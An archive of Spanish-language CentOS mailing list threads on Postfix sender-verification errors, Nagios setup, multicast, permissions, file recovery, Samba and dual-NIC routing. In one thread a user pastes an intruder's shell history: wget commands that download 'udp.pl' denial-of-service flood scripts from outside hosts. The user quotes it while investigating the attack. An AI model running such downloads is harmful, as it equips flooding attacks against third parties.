Cierto. Creo que eme estoy explicando mal. desde enum.server.localdomain puedo enviar mail a gmail echo mail de prueba | mail -s mail deprueba rodrigo.pichin...@gmail.com todo bien pero no puedo enviar a este email-.. rodr...@dominiox.cl si hago dig mx latitud33.cl resuelve bien. me captas?? Ahora sí! ^_^ El servidor de latitud33.cl está comprobando que el dominio que envía existe o es válido. Muy a menudo se hace con una simple consulta DNS inversa (PTR). Como no encuentra el dominio enum-server.localdomain en la dirección IP desde donde se envía el mail pues no lo acepta. De aquí el 550 Sender verify failed (in reply to RCPT TO command). ¿Me explico? ¿Puedes pasar el log de los mails a gmail que sí funcionan? Sólo para intentar confirmar que se trata de eso, aunque si funciona bien no sé si saldremos de dudas... El 4 de marzo de 2014, 12:52, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:15, Rodrigo Pichiñual Norin escribió: enum-server.localdomain es el nombre de host donde envio el mail.esto funciona al enviar a una cuenta gmail pero no al envia a una cuenta del tipo cuentas.cl Si enum-server.localdomain es el nombre de host a donde envías el mail, ¿cómo es resulto este dominio en tu servidor de mail? .localdomain es, como su nombre indica, un dominio local y no resolvible en Internet a menos que lo añadas en /etc/hosts Si haces ping gmail.com funciona. Si haces ping yahoo.com también funciona. Si haces dig mx gmail.com resuelve bien. Si haces dig mx yahoo.com resuelve bien. En cambio ping enum-server.localdomain no funciona y dig
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
Hola, El 04/03/2014 15:40, Rodrigo Pichiñual Norin escribió: Hola a todos: Tengo la siguiente interrogante: Resulta que tengo centos 6.4 al ejecutar el siguiente comando: 1) MTA alternatives --config mta la salida es la siguiente: --- + 1 /usr/sbin/sendmail.postfix * 2 /usr/sbin/sendmail.sendmail Lo cual indica que esta usando postfix. pero NO TENGO configurado postfix. 2) ENVIAR MAIL echo prueba | mail -s asunto de prueba cue...@gmail.com esto funciona enviando mail a GMAIL YAHOO...etc pero no funciona enviando mail a mi cuenta personal o de empresa. ¿El servidor mail de tu empresa es este mismo servidor? 3 ) chequear log localhost postfix/smtp[16415]: A33747AC93: to=rodr...@miaccount.cl, relay= mail.miaccount.cl[67.20.125.184]:25, delay=4.4, delays=0.11/0.01/2.9/1.4, dsn=5.0.0, status=bounced (host mail.miaccount.cl[67.20.125.184] said: 550-Verification failed for root@enum-server.localdomain 550-The mail server could not deliver mail to root@enum-server.localdomain. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries. 550 Sender verify failed (in reply to RCPT TO command)) ¿Porqué si envías a rodr...@miaccount.cl el error es que no puede entregar el mail a root@enum-server.localdomain? ¿Tienes algún alias o redirección a cuentas de usuario o dominios que no existen? porque al enviar a gmail lo hace bien y a una cuenta personal no?? orientación. gracias a todos. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
El 04/03/2014 16:15, Rodrigo Pichiñual Norin escribió: enum-server.localdomain es el nombre de host donde envio el mail.esto funciona al enviar a una cuenta gmail pero no al envia a una cuenta del tipo cuentas.cl Si enum-server.localdomain es el nombre de host a donde envías el mail, ¿cómo es resulto este dominio en tu servidor de mail? .localdomain es, como su nombre indica, un dominio local y no resolvible en Internet a menos que lo añadas en /etc/hosts Si haces ping gmail.com funciona. Si haces ping yahoo.com también funciona. Si haces dig mx gmail.com resuelve bien. Si haces dig mx yahoo.com resuelve bien. En cambio ping enum-server.localdomain no funciona y dig mx enum-server.localdomain tampoco. El 4 de marzo de 2014, 12:13, Francesc Guitart fguit...@gmx.com escribió: Hola, El 04/03/2014 15:40, Rodrigo Pichiñual Norin escribió: Hola a todos: Tengo la siguiente interrogante: Resulta que tengo centos 6.4 al ejecutar el siguiente comando: 1) MTA alternatives --config mta la salida es la siguiente: --- + 1 /usr/sbin/sendmail.postfix * 2 /usr/sbin/sendmail.sendmail Lo cual indica que esta usando postfix. pero NO TENGO configurado postfix. 2) ENVIAR MAIL echo prueba | mail -s asunto de prueba cue...@gmail.com esto funciona enviando mail a GMAIL YAHOO...etc pero no funciona enviando mail a mi cuenta personal o de empresa. ¿El servidor mail de tu empresa es este mismo servidor? 3 ) chequear log localhost postfix/smtp[16415]: A33747AC93: to=rodr...@miaccount.cl, relay= mail.miaccount.cl[67.20.125.184]:25, delay=4.4, delays=0.11/0.01/2.9/1.4, dsn=5.0.0, status=bounced (host mail.miaccount.cl[67.20.125.184] said: 550-Verification failed for root@enum-server.localdomain 550-The mail server could not deliver mail to root@enum-server.localdomain. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries. 550 Sender verify failed (in reply to RCPT TO command)) ¿Porqué si envías a rodr...@miaccount.cl el error es que no puede entregar el mail a root@enum-server.localdomain? ¿Tienes algún alias o redirección a cuentas de usuario o dominios que no existen? porque al enviar a gmail lo hace bien y a una cuenta personal no?? orientación. gracias a todos. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
El 04/03/2014 16:56, Rodrigo Pichiñual Norin escribió: Cierto. Creo que eme estoy explicando mal. desde enum.server.localdomain puedo enviar mail a gmail echo mail de prueba | mail -s mail deprueba rodrigo.pichin...@gmail.com todo bien pero no puedo enviar a este email-.. rodr...@dominiox.cl si hago dig mx latitud33.cl resuelve bien. me captas?? Ahora sí! ^_^ El servidor de latitud33.cl está comprobando que el dominio que envía existe o es válido. Muy a menudo se hace con una simple consulta DNS inversa (PTR). Como no encuentra el dominio enum-server.localdomain en la dirección IP desde donde se envía el mail pues no lo acepta. De aquí el 550 Sender verify failed (in reply to RCPT TO command). ¿Me explico? ¿Puedes pasar el log de los mails a gmail que sí funcionan? Sólo para intentar confirmar que se trata de eso, aunque si funciona bien no sé si saldremos de dudas... El 4 de marzo de 2014, 12:52, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:15, Rodrigo Pichiñual Norin escribió: enum-server.localdomain es el nombre de host donde envio el mail.esto funciona al enviar a una cuenta gmail pero no al envia a una cuenta del tipo cuentas.cl Si enum-server.localdomain es el nombre de host a donde envías el mail, ¿cómo es resulto este dominio en tu servidor de mail? .localdomain es, como su nombre indica, un dominio local y no resolvible en Internet a menos que lo añadas en /etc/hosts Si haces ping gmail.com funciona. Si haces ping yahoo.com también funciona. Si haces dig mx gmail.com resuelve bien. Si haces dig mx yahoo.com resuelve bien. En cambio ping enum-server.localdomain no funciona y dig mx enum-server.localdomain tampoco. El 4 de marzo de 2014, 12:13, Francesc Guitart fguit...@gmx.com escribió: Hola, El 04/03/2014 15:40, Rodrigo Pichiñual Norin escribió: Hola a todos: Tengo la siguiente interrogante: Resulta que tengo centos 6.4 al ejecutar el siguiente comando: 1) MTA alternatives --config mta la salida es la siguiente: --- + 1 /usr/sbin/sendmail.postfix * 2 /usr/sbin/sendmail.sendmail Lo cual indica que esta usando postfix. pero NO TENGO configurado postfix. 2) ENVIAR MAIL echo prueba | mail -s asunto de prueba cue...@gmail.com esto funciona enviando mail a GMAIL YAHOO...etc pero no funciona enviando mail a mi cuenta personal o de empresa. ¿El servidor mail de tu empresa es este mismo servidor? 3 ) chequear log localhost postfix/smtp[16415]: A33747AC93: to=rodr...@miaccount.cl, relay= mail.miaccount.cl[67.20.125.184]:25, delay=4.4, delays=0.11/0.01/2.9/1.4, dsn=5.0.0, status=bounced (host mail.miaccount.cl[67.20.125.184] said: 550-Verification failed for root@enum-server.localdomain 550-The mail server could not deliver mail to root@enum-server.localdomain. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries. 550 Sender verify failed (in reply to RCPT TO command)) ¿Porqué si envías a rodr...@miaccount.cl el error es que no puede entregar el mail a root@enum-server.localdomain? ¿Tienes algún alias o redirección a cuentas de usuario o dominios que no existen? porque al enviar a gmail lo hace bien y a una cuenta personal no?? orientación. gracias a todos. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Error sending a email to account of email personal (postfix)
El 04/03/2014 17:20, Rodrigo Pichiñual Norin escribió: Ok log...envió correcto a cuenta gmail Mar 4 13:42:28 localhost postfix/pickup[16153]: B57077AC8E: uid=0 from=root Mar 4 13:42:28 localhost postfix/cleanup[16212]: B57077AC8E: message-id=20140304134228.B57077AC8E@enum.localdomain Mar 4 13:42:28 localhost postfix/qmgr[2121]: B57077AC8E: from=root@eNUM.localdomain, size=471, nrcpt=1 (queue active) Mar 4 13:42:29 localhost postfix/smtp[16214]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4002:c07::1a]:25: Network is unreachable Mar 4 13:42:30 localhost postfix/smtp[16214]: B57077AC8E: to= rodrigo.pichin...@gmail.com, relay=gmail-smtp-in.l.google.com[74.125.137.26]:25, delay=2.1, delays=0.19/0.04/1.2/0.65, dsn=2.0.0, status=sent (250 2.0.0 OK 1393940550 e32si24471118yhi.62 - gsmtp) Mar 4 13:42:30 localhost postfix/qmgr[2121]: B57077AC8E: removed Efectivamente no se ve nada. Todo funciona OK y no da ninguna pista. Creo que también puede ser el dns interno que tenemos, el cual no resuelve algunos host No creo que sea eso. ¿Porqué afectaría tu DNS interno a que un servidor de mail externo acepte o no un mail? Puedes hacer una prueba para verificar que mi teoría es cierta. Si el servidor de mail que nos ocupa acepta conexiones telnet al puerto 25 intenta mandar un mail por comandos SMTP desde una dirección de mail que no existe, por ejemplo he...@yyt.com. Después repite los pasos con root@enum.server.localdomain. Si el error es el mismo estoy en lo cierto. Para mandar el un mail por telnet: telnet mail.latitud33.cl 25 EHLO yyt.com MAIL FROM: he...@yyt.com RCPT TO: rodr...@latitud33.cl DATA Subject: Prueba Hola pajarito sin cola. . QUIT Repite esto remplazando he...@yyt.com por root@enum-server.localdomain Saludos. El 4 de marzo de 2014, 13:17, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:56, Rodrigo Pichiñual Norin escribió: Cierto. Creo que eme estoy explicando mal. desde enum.server.localdomain puedo enviar mail a gmail echo mail de prueba | mail -s mail deprueba rodrigo.pichin...@gmail.com todo bien pero no puedo enviar a este email-.. rodr...@dominiox.cl si hago dig mx latitud33.cl resuelve bien. me captas?? Ahora sí! ^_^ El servidor de latitud33.cl está comprobando que el dominio que envía existe o es válido. Muy a menudo se hace con una simple consulta DNS inversa (PTR). Como no encuentra el dominio enum-server.localdomain en la dirección IP desde donde se envía el mail pues no lo acepta. De aquí el 550 Sender verify failed (in reply to RCPT TO command). ¿Me explico? ¿Puedes pasar el log de los mails a gmail que sí funcionan? Sólo para intentar confirmar que se trata de eso, aunque si funciona bien no sé si saldremos de dudas... El 4 de marzo de 2014, 12:52, Francesc Guitart fguit...@gmx.com escribió: El 04/03/2014 16:15, Rodrigo Pichiñual Norin escribió: enum-server.localdomain es el nombre de host donde envio el mail.esto funciona al enviar a una cuenta gmail pero no al envia a una cuenta del tipo cuentas.cl Si enum-server.localdomain es el nombre de host a donde envías el mail, ¿cómo es resulto este dominio en tu servidor de mail? .localdomain es, como su nombre indica, un dominio local y no resolvible en Internet a menos que lo añadas en /etc/hosts Si haces ping gmail.com funciona. Si haces ping yahoo.com también funciona. Si haces dig mx gmail.com resuelve bien. Si haces dig mx yahoo.com resuelve bien. En cambio ping enum-server.localdomain no funciona y dig mx enum-server.localdomain tampoco. El 4 de marzo de 2014, 12:13, Francesc Guitart fguit...@gmx.com escribió: Hola, El 04/03/2014 15:40, Rodrigo Pichiñual Norin escribió: Hola a todos: Tengo la siguiente interrogante: Resulta que tengo centos 6.4 al ejecutar el siguiente comando: 1) MTA alternatives --config mta la salida es la siguiente: --- + 1 /usr/sbin/sendmail.postfix * 2 /usr/sbin/sendmail.sendmail Lo cual indica que esta usando postfix. pero NO TENGO configurado postfix. 2) ENVIAR MAIL echo prueba | mail -s asunto de prueba cue...@gmail.com esto funciona enviando mail a GMAIL YAHOO...etc pero no funciona enviando mail a mi cuenta personal o de empresa. ¿El servidor mail de tu empresa es este mismo servidor? 3 ) chequear log localhost postfix/smtp[16415]: A33747AC93: to=rodr...@miaccount.cl , relay= mail.miaccount.cl[67.20.125.184]:25, delay=4.4, delays=0.11/0.01/2.9/1.4, dsn=5.0.0, status=bounced (host mail.miaccount.cl[67.20.125.184] said: 550-Verification failed for root@enum-server.localdomain 550-The mail server could not deliver mail to root@enum-server.localdomain. The account or domain may not exist, they may be blacklisted, or missing the proper dns entries. 550 Sender verify failed (in reply to RCPT TO command)) ¿Porqué
Re: [CentOS-es] Usuario Nagios
El 01/10/13 15:44, Rodrigo Pichiñual Norin escribió: Hola a todos. Hola, Acabo de instalar nagios, para monitorear una serie de servidores. accedo a la plataforma web con el usuario nagiosadmin y la contraseña respectiva que yo le asigne-- Mi pregunta es como puedo crear mas usuario con acceso a Nagios y con distintos privilegioses posible?? En el directorio principal de Nagios debe haber un fichero htpasswd.users con los usuarios y paswords cifrados de Nagios. Puedes añadir usuarios a Nagios con el comando htpasswd: htpasswd htpasswd.users nombreusuario Si quieres hacerlo mejor, vas a añadir muchos usuarios o quieres usar los mismos passwords que ya tienes (por ejemplo en un AD), usa el módulo correspondiente en Apache (mod_authnz_ldap). Configura el VirtualHost de Nagios para que use la autenticación con dicho módulo: https://httpd.apache.org/docs/trunk/mod/mod_authnz_ldap.html Respecto a los privilegios para cada usuario puedes hacer algo desde el fichero cgi.cfg y sus directivas: authorized_for_loquesea http://nagios.sourceforge.net/docs/3_0/cgiauth.html http://nagios.sourceforge.net/docs/3_0/configcgi.html Muchas gracias. De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Multicast por UDP
Hola, Entre el host que envía los paquetes UDP y los ordenadores que los reciben, ¿que hay en medio? Lo que quiero decir es que los dispositivos de red (routers y switchs) por los que pasa el trafico UDP deben soportar y tener bien configurado multicast. Verifica que tienes activado al menos un dispositivo con el rol IGMP Querier en la red y IGMP Snooping en todos. Saludos. -- Francesc Guitart El 17/09/13 17:56, Normando Hall escribió: Buenos días colegas. Hace tiempo tengo un centos 6 64bits funcionando, y estamos intentando conocer el origen del problema que tenemos. Se trata de enviar simultáneamente unos 500 mensajes por UDP a distintas IP de destino, también 500 ips distintas. Cada mensaje no supera los 100 bytes de longitud. El problema es que cuando hacemos el envío, verificamos en algunas IPs de destino que en algunas llega el mensaje y no en otras. Hicimos muchas pruebas en su momento no llegando a ninguna conclusión cierta. Cambiamos algunos buffers del kernel, etc. sin cambios en los resultados. Nuestra duda es si era culpa de nuestra aplicación o había algo en el kernel que limitara esto. Hace poco di con un artículo interesante que trata algo de esto, pero aún no hemos podido hacer las pruebas. Mi pregunta es si alguien sabe a que se puede deber este inconveniente. El artículo que mencioné es el siguiente: https://access.redhat.com/site/documentation/en-US/JBoss_Enterprise_Web_Platform/5/html/Administration_And_Configuration_Guide/jgroups-perf-udpbuffer.html Saludos cordiales ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda con Nagios y agregar servicio
Hola Rodrigo, Quita el -H cvbuilder de la linea check_command y déjala así: check_command check_mysql -P 3306 -u root_passwd En check_command no es necesario indicar el host ya que ya que en la definición del servicio hay una linea para ello: host_name cvbuilder Saludos. -- Francesc Guitart Service DSI (33) 4 77 43 84 32 ENISE Le 07/08/2013 20:20, Rodrigo Pichiñual Norin a écrit : Hola a todos: necesito de su ayuda. Tengo instalado nagios en nuestra red local y necesito monitorear los servicios *http y mysql*. tengo definido el host y el servicio httpd de esta manera: define host { use linux-server host_name cvbuilder alias client address 192.168.10.113 max_check_attempts 3 check_period24x7 check_interval 3 notification_interval 10 notification_period 24x7 } define service{ use generic-service host_name cvbuilder service_description WWW check_command check_http notifications_enabled 1 } y funciona. pero estoy agregando el servicio mysql de esta manera define host { use linux-server host_name cvbuilder alias client address 192.168.10.113 max_check_attempts 3 check_period24x7 check_interval 3 notification_interval 10 notification_period 24x7 } define service{ use generic-service host_name cvbuilder service_description WWW check_command check_http notifications_enabled 1 } define service{ use generic-service host_name cvbuilder service_description Mysql check_command check_mysql -H cvbuilder -P 3306 -u root -ppasswd notifications_enabled 1 } pero no me funciona...estoy recien aprendiendo e investigando de nagios. Agradeceria su orientación. Saludos ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Consulta sobre permisos de programas instalado como root o usuario
Hola, Le 28/08/2013 14:29, Luciano Andrés Chiarotto a écrit : Hola Amigos. Tengo una duda sobre un problema de instalar los programas como root. Dos casos: 1-Si el administrador instala un programa como root para que ese programa pueda ser usado por el resto de todos los usuarios, hay que hacer alguna configuración para que tengan permisos y usar dicho programa ? Si puedes meter a todos los usuarios en un grupo entonces dale permisos de ejecución a ese grupo y ya está: owner:grupo r-xr-x--- Si no es factible meter a todos los usuarios dentro de un mismo grupo entonces da permisos de ejecución para others. ATENCIÓN! En este caso TODOS los usuarios del sistema podrán ejecutar el la aplicación. owner:grupo r-x---r-x 2-Si el programa lo instala un usuario que no sea el root, como se debe configurar para que el resto de los usuarios tengan permisos y puedan usar dicho programa ? Si el usuario tiene permiso para cambiar el grupo de pertenencia y los permisos de la aplicación la respuesta es exactamente igual al caso anterior. Si el usuario no puede cambiar los permisos y el grupo de pertenencia deberá hacerlo el administrador basándose en los criterios anteriormente comentados. Tengo una respuesta pero me gustaría que me den una opinión al respecto. Para acabar, si son muchos los usuarios y quieres mas flexibilidad que la que el sistema nativo de permisos Linux te proporciona puedes usar ACL. Las ACL te permiten un alto nivel de granularidad para asignar permisos a múltiples usuarios y grupos. Desde ya muchas gracias. De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] discos lvm2pv
Hola, Le 27/05/2013 19:59, Ricardo Mendoza Huerta a écrit : Hola a todos. Expongo el siguiente escenario en busca de alguien que haya tenido una experiencia similiar que pueda ayudarme a recuperar una carpeta: 1. se trata de un NAS (iomega StorCenter ix2) tiene 2 discos de 1 Tb en un arreglo RAID 1. 2. mediante su gestor web se adquirieron alguna cuentas de un dominio Active Directory. 3. se crearon algunos recursos compartidos asociados a los nombres adquiridos en el punto 2 4. con ese mismo gestor se eliminaron carpetas creadas 5. este gestor no tiene herramientas de recuperacion de carpetas borradas algunas pruebas realizadas: - fdisk -l me muestra el disco con 2 particiones 83 linux - con wifiway se detecto que era una lvm2pv (otras distros la siguen viendo como 83) - pvscan, vgscan, lvscan no ayudan por que no intento reconstruir el volumen ni ahora ni luego - cuando se trata de montar la partición , da un error de formato de disco desconocido. lo que necesito es cargar esa partición, recuperar algunas carpetas y ficheros que fueron borrados y otros que no fueron borrados y luego usar ese disco para otras cosas. agradezco mucho compartir su experiencia con algun caso similar La suite testdisk (testdisk + PhotoRec) puede ayudarte. Por un lado tienes PhotoRec que hará un trabajo similar a Foremost recuperando ficheros borrados (atención!! ni con Foremost ni con PhotoRec vas a recuperar ficheros no borrados) y guardándolos en directorios y sin respetar el nombre original del fichero. Por otro lado tienes Testdisk que es capaz de reparar la tabla de particiones. Si lo hace con éxito podrás volver a montar el disco. Un vez montado recuperas los directorios no borrados. Ademas, con Testdisk, (solo si la tabla de particiones esta sana) tienes un Undelete que te permite recuperar ficheros y carpetas enteros respetando los nombres originales y también la estructura de directorios y subdirectorios. Para saber mas de Testdisk mira en su web, tienes tutoriales con bastantes situaciones distintas: http://www.cgsecurity.org/wiki/TestDisk_ES Especialmente ésta donde se explica el undelete de testdisk para ext2: http://www.cgsecurity.org/wiki/TestDisk:_undelete_file_for_ext2 Yo lo he probado con ext3 (y creo que con ext4) y funciona perfectamente. Una ultima cosa. Si quieres tener garantías de recuperar los datos borrados monta el disco con solo lectura e intenta hacer un imagen con dd o dd-rescue en otro disco (si es que tienes un disco de 500 GB de sobra). A medida que uses el disco pierdes posibilidades de recuperar los datos borrados ya que pueden sobrescribirse con datos nuevos. Una vez tengas la imagen hecha la montas con mount -o loop y haces todos los intentos de recuperación contra la imagen. Así si te equivocas o el proceso de recuperación falla y corrompe la tabla particiones siempre tienes el disco físico para volver a hacer otra imagen y volver a intentarlo. Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Hola, Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit : Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...- pam_unix Begin dovecot: Authentication Failures: contacto rhost=66.142.38.137 : 88 Time(s) [...] turismo rhost=66.142.38.137 : 57 Time(s).. . (hay mas resgisto q no lo pongo es bastante todos salen de la misma ip)Unknown Entries: check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman Como te ha respondido José Fernández los logs muestran intentos de conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, que a su vez parece ser propiedad de ATT: adsl-66-142-38-137.dsl.kscymo.swbell.net Si siempre es esta IP la que trata de acceder a tu servidor contacta con ellos, tienen una cuenta de correo para estos casos. Escríbeles a ab...@swbell.net y explícales el problema. Deberían poner remedio. http://public.swbell.net/contact.html Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Probelma con 2 tarjeta de red en CentOS6.3
]: Deleting interface #13 eth1, 10.20.2.24#123, interface stats: received=57, sent=57, dropped=0, active_time=5096 secs Mar 20 09:18:47 lorentz ntpd[1765]: Listening on interface #20 eth1, fe80::250:56ff:fe8a:d03c#123 Enabled Mar 20 09:18:47 lorentz ntpd[1765]: Listening on interface #21 eth1, 10.20.2.24#123 Enabled D EVICE= eth1 HWADDR=00:50:56:8a:d0:3c NM_CONTROLLED=no ONBOOT=yes IPADDR=10.20.2.24 BOOTPROTO=none NETMASK=255.255.0.0 DNS2=10.1.2.54 TYPE=Ethernet GATEWAY=10.20.1.12 DNS1=10.20.1.12 IPV6INIT=no USERCTL=no ~ DNS1=10.1.1.1 DEVICE=eth3 BOOTPROTO=none TYPE=Ethernet HWADDR=00:50:56:8a:45:de NM_CONTROLLED=no ONBOOT=no IPV6INIT=no USERCTL=no IPADDR=10.1.10.68 NETMASK=255.255.0.0 GATEWAY=10.1.1.1 ~ No sera un problema de enrutamiento? Puedes mandar la salida de netstat -rn antes y después de configurar eth3? Y iptables? no creo ya que en principio no añadir otra ethernet no debería desconectar la primera, pero... Manda la salida de iptables -L -n antes y después de configurar eth3. Y ya de paso, manda también la salida de ifconfig -a antes y después de configurar eth3. Gracias por adelantado. De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] centos como servidor de archivos compartidos
Hola, Le 18/03/2013 17:45, César C. a écrit : buenos dias tengo un caso: Tengo un servidor centos con samba que comparte archivos. Con windows 7 funciona normal puedo ingresar a este servidor usando archivos compartidos, pero cuando subo este equipo con windows 7 al dominio ya no me puedo conectar. ¿les ha pasado? Seguramente el problema es que el servidor CentOS no conoce al usuario del dominio Windows con el que has arrancado la sesión en Windows 7. El servidor CentOS forma parte del dominio? -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Probelma con 2 tarjeta de red en CentOS6.3
Respondo entre lineas Le 20/03/2013 10:19, Antonio Manogué Saiz a écrit : Iptables está desactivado en esta máquina. [root@lorentz ~]# iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination Solo eth1 [root@lorentz ~]# route -en Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 10.20.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 0.0.0.0 10.20.1.12 0.0.0.0 UG0 0 0 eth1 [root@lorentz ~]# ifconfig -a eth1 Link encap:Ethernet HWaddr 00:50:56:8A:D0:3C inet addr:10.20.2.24 Bcast:10.20.255.255 Mask:255.255.0.0 inet6 addr: fe80::250:56ff:fe8a:d03c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:385431 errors:0 dropped:0 overruns:0 frame:0 TX packets:16148 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:37555994 (35.8 MiB) TX bytes:1949316 (1.8 MiB) eth3 Link encap:Ethernet HWaddr 00:50:56:8A:45:DE BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:6421 errors:0 dropped:0 overruns:0 frame:0 TX packets:294 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:646119 (630.9 KiB) TX bytes:49064 (47.9 KiB) loLink encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Después de ifup eth3 [root@lorentz ~]# route -en Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 10.1.0.00.0.0.0 255.255.0.0 U 0 0 0 eth3 10.20.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth3 0.0.0.0 10.1.1.10.0.0.0 UG0 0 0 eth3 Cual es la red 169.254.0.0? Y porqué es accesible desde las dos ethernet y con la misma métrica? [root@lorentz ~]# ifconfig -a eth1 Link encap:Ethernet HWaddr 00:50:56:8A:D0:3C inet addr:10.20.2.24 Bcast:10.20.255.255 Mask:255.255.0.0 inet6 addr: fe80::250:56ff:fe8a:d03c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:388473 errors:0 dropped:0 overruns:0 frame:0 TX packets:16181 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:37870282 (36.1 MiB) TX bytes:1954442 (1.8 MiB) eth3 Link encap:Ethernet HWaddr 00:50:56:8A:45:DE inet addr:10.1.10.68 Bcast:10.1.255.255 Mask:255.255.0.0 inet6 addr: fe80::250:56ff:fe8a:45de/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1558 errors:0 dropped:0 overruns:0 frame:0 TX packets:128 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:156719 (153.0 KiB) TX bytes:15965 (15.5 KiB) loLink encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Si que apunta a problemas con GW. Exactamente. Como constatas que se pierde la conexión en eth1? Haces ping desde otra maquina a eth1 o haces ping desde este servidor a una red que es accesible a través de eth1? Que rangos de IP usan estas redes que no son accesibles por eth1? Un saludo, Antonio MANOGUE - Mensaje original - | De: Francesc Guitart francesc.guit...@enise.fr | Para: centos-es@centos.org | Enviados: Miércoles, 20 de Marzo 2013 10:01:25 | Asunto: Re: [CentOS-es] Probelma con 2 tarjeta de red en CentOS6.3 | Hola, | -rn | Le 20/03/2013 